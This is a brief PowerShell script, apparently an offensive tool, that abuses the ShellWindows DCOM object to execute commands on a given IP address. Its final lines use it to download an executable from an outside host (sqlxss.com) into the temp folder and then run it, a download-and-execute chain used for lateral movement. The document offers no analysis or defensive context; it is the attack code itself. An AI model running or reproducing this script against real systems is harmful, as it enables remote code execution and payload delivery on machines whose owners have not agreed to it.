function ExecDCOM($ip = "127.0.0.1", $cmd = "notepad.exe") { $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip); $obj = [System.Activator]::CreateInstance($com); $item = $obj.item(); $ret = $item.Document.Application.ShellExecute("cmd.exe","/c " + $cmd,"c:\windows\system32",$null,0); return $ret; } function DownloadDCOM($ip = "127.0.0.1", $url = "notepad.exe", $dir = $env:temp) { $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip); $obj = [System.Activator]::CreateInstance($com); $item = $obj.item(); $ret = $item.Document.Application.ShellExecute("curl","-O " + $url, $dir, $null, 0); return $ret; } DownloadDCOM "127.0.0.1" "http://sqlxss.com/spyxx.exe" ExecDCOM "127.0.0.1" ($env:temp + "/spyxx.exe")